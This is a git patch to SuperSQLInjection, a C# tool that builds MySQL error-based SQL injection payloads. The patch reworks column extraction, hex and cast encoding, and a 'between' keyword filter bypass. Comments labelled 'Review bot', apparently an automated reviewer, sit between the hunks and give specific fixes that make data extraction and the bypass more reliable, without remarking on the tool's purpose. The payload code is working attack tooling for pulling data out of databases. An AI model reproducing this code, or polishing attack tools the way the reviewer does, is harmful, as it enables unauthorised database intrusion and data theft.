From d27a7b16fbe51b7341de0131ee26536cef0b7f6a Mon Sep 17 00:00:00 2001
From: shack2 <1341413415@qq.com>
Date: Thu, 6 Dec 2018 17:58:01 +0800
Subject: [PATCH] 20181206
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件,增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时,显错注入无法获取数据的情况。
修复MySQL显错注入,获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。
---
 SuperSQLInjection/Main.cs | 89 ++++++++++++++--------
 SuperSQLInjection/payload/MySQL.cs | 95 ++++++++++++++++++++++++++----
 2 files changed, 128 insertions(+), 56 deletions(-)
diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs
index ea04eaa..8a69234 100644
--- a/SuperSQLInjection/Main.cs
+++ b/SuperSQLInjection/Main.cs
@@ -230,7 +230,7 @@ public static String getSid()
 return sid;
 }
- public static int version = 20181205;
+ public static int version = 20181206;
 public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
 //检查更新
 public void checkUpdate()
@@ -1760,32 +1760,28 @@ public void addNodeToTreeList(TreeNode tn, String text, String type)
 private String ByPassForBetween(String paylaod, int len)
 {
- String newpayload = "";
- if (config.useBetweenByPass == false)
+ String newpayload = paylaod.Replace("{len}", len + "");
+ if(config.useBetweenByPass)
 {
- newpayload = paylaod.Replace("{len}", len + "");
- }
- else
- {
- paylaod = paylaod.Replace("{len}", "");
- if (paylaod.IndexOf(">=") != -1)
+
+ if (newpayload.IndexOf(">=") != -1)
 {
- newpayload = paylaod.Replace(">=", " not between 0 and " + (len - 1));
+ newpayload = newpayload.Replace(">=", " not between 0 and " + (len - 1));
 }
- else if (paylaod.IndexOf(">") != -1)
+ else if (newpayload.IndexOf(">") != -1)
 {
- newpayload = paylaod.Replace(">", " not between 0 and " + len);
+ newpayload = newpayload.Replace(">", " not between 0 and " + len);
 }
- else if (paylaod.IndexOf("=") != -1)
+ else if (newpayload.IndexOf("=") != -1)
 {
- newpayload = paylaod.Replace("=", " between " + len + " and " + len);
+ newpayload = newpayload.Replace("=", " between " + len + " and " + len);
 }
 else if (paylaod.IndexOf("<") != -1)
 {
- newpayload = paylaod.Replace("<", " between 0 and " + len);
- }
-
+ newpayload = newpayload.Replace("<", " between 0 and " + len);
+ }
 }
+
 return newpayload;
 }
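Review bot: The `<` branch rewrites `x < len` as `x between 0 and len`, which also accepts `x = len`, whereas the other three branches are exact rewrites (`>=` → `not between 0 and len-1`, `>` → `not between 0 and len`, `=` → `between len and len`), so a length search that relies on `<` under the between-bypass is off by one unless a caller compensates; the fix is `newpayload = newpayload.Replace("<", " between 0 and " + (len - 1));`. That branch also still tests `paylaod.IndexOf("<")` after the other three were moved to `newpayload`; it gives the same answer only because `{len}` contains no `<`, so `else if (newpayload.IndexOf("<") != -1)` keeps the method consistent. `Replace` rewrites every occurrence of the operator in the whole payload, not just the comparison, which deserves a comment above the first `IndexOf`: `// assumes the operator occurs once; Replace rewrites every occurrence`.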
@@ -3862,44 +3858,45 @@ public void getDataValueByErrorByMySQL(Object opam)
 try
 {
 GetDataPam gp = (GetDataPam)opam;
+ //获取数据长度
- ListViewItem lvi = null;
- foreach (String column in gp.columns)
- {
- //获取数据长度
+ String datas_payload_columns = MySQL.hex_value.Replace("{data}", MySQL.creatMySQLColumnsNoConcatStr(gp.columns, gp.table, gp.dbname, gp.limit));
+ String datas_payload_length = MySQL.concatMySQLColumn(MySQL.char_length.Replace("{data}", datas_payload_columns));
- String datas_payload_columns = MySQL.creatMySQLColumnStr(column);
- String datas_payload_length = MySQL.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)");
+ String datas_payload_length_error = MySQL.error_value.Replace("{data}", datas_payload_length);
- String d_l_e = MySQL.creatMySQLColumnStr("(" + datas_payload_length + ")");
- String datas_payload_length_error = MySQL.error_value.Replace("{data}", d_l_e);
+ String result_length = getOneDataByUnionOrError(datas_payload_length_error);
- String result_length = getOneDataByUnionOrError(datas_payload_length_error);
+ int sumlen = Tools.convertToInt(result_length);
- int sumlen = Tools.convertToInt(result_length);
- String datas_value_payload = "(select " + MySQL.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
- String result = "";
- int start = 1;
- //每次获取长度,err方式有长度限制
- int count = 64 - 6;
- this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info);
- while (start < sumlen)
- {
- //hex编码,防止中文等乱码
- String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count);
- String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_column);
- result += getOneDataByUnionOrError(c_datas_value_payload);
- start += count;
- }
+ String result = "";
+ int start = 1;
+ //每次获取长度,err方式有长度限制59个字符
+ int count = 64 - 6;
+ this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info);
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_payload_columns).Replace("{start}", start.ToString()), count);
+ String c_datas_value_payload = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(datas_value_column));
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ }
+
+ result = Tools.unHex(result, "UTF-8");
+ String[] items = Regex.Split(result, "\\$\\$\\$");
+ ListViewItem lvi = null;
+ foreach (String item in items)
+ {
 if (lvi == null)
 {
- lvi = new ListViewItem(result);
+
+ lvi = new ListViewItem(item);
 }
 else
 {
- lvi.SubItems.Add(result);
+ lvi.SubItems.Add(item);
 }
-
 }
 this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
 this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!", LogLevel.info);
@@ -5739,7 +5736,7 @@ public void readOrWriteFile()
 try
 {
 String payload_len = MySQL.char_length.Replace("{data}", data_payload);
- String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.creatMySQLColumnStr(payload_len));
+ String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(payload_len));
 String result_length = getOneDataByUnionOrError(payload_len_error);
@@ -5755,7 +5752,7 @@ public void readOrWriteFile()
 while (start < sumlen)
 {
 //hex编码,防止中文等乱码
- String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count);
+ String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnCastStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count);
 String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_tmp);
 result += getOneDataByUnionOrError(c_datas_value_payload);
 start += count;
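Review bot: The new `foreach (String item in items)` trusts that `Regex.Split(result, "\\$\\$\\$")` yields exactly one item per requested column, but the `0x242424` separator is concatenated with the raw column values inside `creatMySQLColumnsNoConcatStr` before the `hex_value` wrapper is applied, so a value that itself contains `$$$` shifts every later column into the wrong cell, and a NULL column (which nulls the whole `concat()` in MySQL) empties the row, in both cases with the usual "获取到第…行的值!" log line; add a guard before the `ListViewItem` is built, e.g. `if (items.Length != gp.columns.Count) this.Invoke(new showLogDelegate(log), "column count mismatch: got " + items.Length + ", expected " + gp.columns.Count, LogLevel.info);`. The loop `while (start < sumlen)` skips the final character whenever `sumlen` equals `1 + k*count`; with even-length hex output and `count = 58` that cannot happen here, but `start <= sumlen` is the form that stays correct if `count` changes. The comment above `count` says the limit is 59 characters while the value is `64 - 6 = 58`; make the two agree. `getDataValueByErrorByMySQL` begins before this hunk and its `catch` lies after it.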
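Review bot: The comment `//hex编码,防止中文等乱码` above the changed line in the second `readOrWriteFile` hunk now sits on a call to `creatMySQLColumnCastStr`, which wraps the substring in `ifnull(cast(... as char),0x20)` rather than `hex()`; unless `data_payload` (built above this hunk) already applies `hex`, the comment describes an encoding that no longer happens on this line. Either reword it to `// cast to char and replace NULL with a space; no hex encoding here` or call `creatMySQLColumnHexStr` instead, whichever matches how `result` is decoded further down. The enclosing loop starts before this hunk and continues after it.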
diff --git a/SuperSQLInjection/payload/MySQL.cs b/SuperSQLInjection/payload/MySQL.cs
index 0e23504..9f74e6f 100644
--- a/SuperSQLInjection/payload/MySQL.cs
+++ b/SuperSQLInjection/payload/MySQL.cs
@@ -106,7 +106,7 @@ public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex,
 if (i == showIndex)
 {
- sb.Append(creatMySQLColumnStr(columns) + ",");
+ sb.Append(concatMySQLColumnStr(columns) + ",");
 }
 else
 {
@@ -148,7 +148,7 @@ public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,Str
 if (i == showIndex)
 {
- sb.Append(creatMySQLColumnStr(data) + ",");
+ sb.Append(concatMySQLColumn(data) + ",");
 }
 else
 {
@@ -188,7 +188,7 @@ public static String creatMySQLWriteFileByUnionByMuSQL(String path, String conte
 public static String creatMySQLColumnsStrByError(List columns, String table, String dbName, int limit)
 {
 StringBuilder sb = new StringBuilder();
- sb.Append(creatMySQLColumnStr(columns));
+ sb.Append(concatMySQLColumnStr(columns));
 if (!Tools.checkEmpty(dbName))
 {
@@ -216,8 +216,14 @@ public static String creatMySQLColumnsStrByError(List columns, String ta
 public static String creatMySQLColumnsStrByError(String column, String table, String dbName, int limit)
 {
- StringBuilder sb = new StringBuilder();
- sb.Append(creatMySQLColumnStr(column));
+ List List = new List();
+ List.Add(column);
+ return creatMySQLColumnsStrByError(List, table, dbName, limit);
+ }
+ public static String creatMySQLColumnsHexStrByError(String column, String table, String dbName, int limit)
+ {
+ StringBuilder sb = new StringBuilder("(select ");
+ sb.Append(creatMySQLColumnHexStr(column));
 if (!Tools.checkEmpty(dbName))
 {
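Review bot: In the `creatMySQLColumnsStrByError(String column, ...)` overload the local is named `List` (`List List = new List();`), the same as its type, which compiles but makes the next two lines read like static calls; `List columns = new List(); columns.Add(column); return creatMySQLColumnsStrByError(columns, table, dbName, limit);` says what it holds (the generic argument appears stripped from this listing, keep whatever the file has). `creatMySQLColumnsHexStrByError` opens the subquery with `"(select "` and its body continues past the end of this hunk, so the matching `)` is out of view here; a one-line comment on the `StringBuilder` line, `// opening "(" is closed by the trailing limit clause`, would make the pairing obvious to the next reader.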
@@ -236,12 +242,49 @@ public static String creatMySQLColumnsStrByError(String column, String table, St
 }
 if (limit >= 0)
 {
- sb.Append(" limit " + limit + ",1");
+ sb.Append(" limit " + limit + ",1)");
+
+ }
+ return sb.ToString();
+ }
+
+ public static String creatMySQLColumnsNoConcatStr(List columns, String table, String dbName, int limit)
+ {
+
+
+ StringBuilder sb = new StringBuilder("(select concat(");
+ foreach (String c in columns) {
+ sb.Append(c + ",0x242424,");
+ }
+ if (columns.Count > 0)
+ {
+ sb.Remove(sb.Length - 10, 10);
+ }
+ sb.Append(")");
+ if (!Tools.checkEmpty(dbName))
+ {
+ sb.Append(" from " + dbName + ".");
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(table);
+ }
+ }
+ else
+ {
+ if (!Tools.checkEmpty(table))
+ {
+ sb.Append(" from " + table);
+ }
+ }
+ if (limit >= 0)
+ {
+ sb.Append(" limit " + limit + ",1)");
 }
 return sb.ToString();
 }
+ ///
@@ -249,18 +292,18 @@ public static String creatMySQLColumnsStrByError(String column, String table, St
 ///
 /// 列明
 ///
- public static String creatMySQLColumnStr(List columns)
+ public static String concatMySQLColumnStr(List columns)
 {
 StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
 for (int i = 0; i < columns.Count; i++)
 {
 if (columns.Count > 1)
 {
- sb.Append("ifnull(cast(" + columns[i] + " as char),0x20),0x242424,");
+ sb.Append(columns[i]+",0x242424,");
 }
 else
 {
- return creatMySQLColumnStr(columns[i]);
+ return concatMySQLColumn(columns[i]);
 }
 }
@@ -275,12 +318,13 @@ public static String creatMySQLColumnStr(List columns)
 }
+ ///
 /// 生成查询列数据
 ///
 /// 列明
 ///
- public static String creatMySQLColumnStr(String column)
+ public static String concatMySQLColumn(String column)
 {
 StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
 sb.Append(column);
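Review bot: In both `creatMySQLColumnsHexStrByError` (top of the hunk) and the new `creatMySQLColumnsNoConcatStr`, the `)` that closes the opening `"(select "` is emitted only inside `if (limit >= 0)`, as `" limit " + limit + ",1)"`, so a negative `limit` (which that guard explicitly admits) produces an unbalanced subquery and a syntax error on the target; append `" limit " + limit + ",1"` inside the guard and `sb.Append(")");` unconditionally after it, in both methods. `creatMySQLColumnsNoConcatStr` also concatenates bare column names, and MySQL's `concat()` returns NULL when any argument is NULL, so one NULL column makes the whole row's value NULL and the row is lost; `sb.Append("ifnull(" + c + ",0x20),0x242424,");` keeps the NULL guard the old `ifnull(cast(...))` form provided, and `sb.Remove(sb.Length - 10, 10)` still trims correctly because the separator suffix is unchanged. That `Remove` call deserves a comment, `// drop the trailing ",0x242424," separator`, so nobody has to count characters. `creatMySQLColumnsHexStrByError` begins before this hunk.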
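Review bot: In `concatMySQLColumnStr` the multi-column branch now appends the bare `columns[i]` where it used to append `ifnull(cast(columns[i] as char),0x20)`, and MySQL's `concat()` returns NULL if any argument is NULL, so a UNION row with one NULL column now renders as NULL instead of a space-padded row; if the `cast` was the cause of the garbling the commit message mentions, `sb.Append("ifnull(" + columns[i] + ",0x20),0x242424,");` drops the cast but keeps the NULL guard. The single-column case still returns `concatMySQLColumn(columns[i])` on the first iteration, which (per the last hunk in this file) also appends the column bare, so both paths are now unprotected; a comment on the branch, `// NOTE: no NULL guard here; a NULL column nulls the whole concat`, should at least record that. The separator trimming and the return lie past the end of this hunk.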
@@ -289,5 +333,36 @@ public static String creatMySQLColumnStr(String column)
 }
+ ///
+ /// 生成查询列数据
+ ///
+ /// 列明
+ ///
+ public static String creatMySQLColumnCastStr(String column)
+ {
+ StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
+ sb.Append("ifnull(cast(" + column + " as char),0x20)");
+ sb.Append(",0x215e5e)");
+ return sb.ToString();
+
+ }
+
+ ///
+ /// 生成查询列数据
+ ///
+ /// 列明
+ ///
+ public static String creatMySQLColumnHexStr(String column)
+ {
+ StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
+ sb.Append(hex_value.Replace("{data}",column));
+ sb.Append(",0x215e5e)");
+ return sb.ToString();
+
+ }
+
+
+
+
 }
 }
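Review bot: Both new helpers carry an identical copy-pasted doc header (`/// 生成查询列数据` … `/// 列明`) although they wrap the column differently, so the docs give no hint which one to call; the XML tags appear stripped from this listing, so keep whatever tags the file uses. For `creatMySQLColumnCastStr` write `/// Builds concat(0x5e5e21,ifnull(cast(column as char),0x20),0x215e5e): a NULL column yields a space instead of nulling the whole concat.`, and for `creatMySQLColumnHexStr` write `/// Builds concat(0x5e5e21,<hex_value template>(column),0x215e5e) so multibyte values survive error-based extraction; hex(NULL) is NULL, so this variant has no NULL guard.` (`hex_value` is presumably a `hex({data})` template — confirm before wording it that way). The blank line inserted before each method's closing `}` and the four empty lines added ahead of the class's closing brace are noise; drop them.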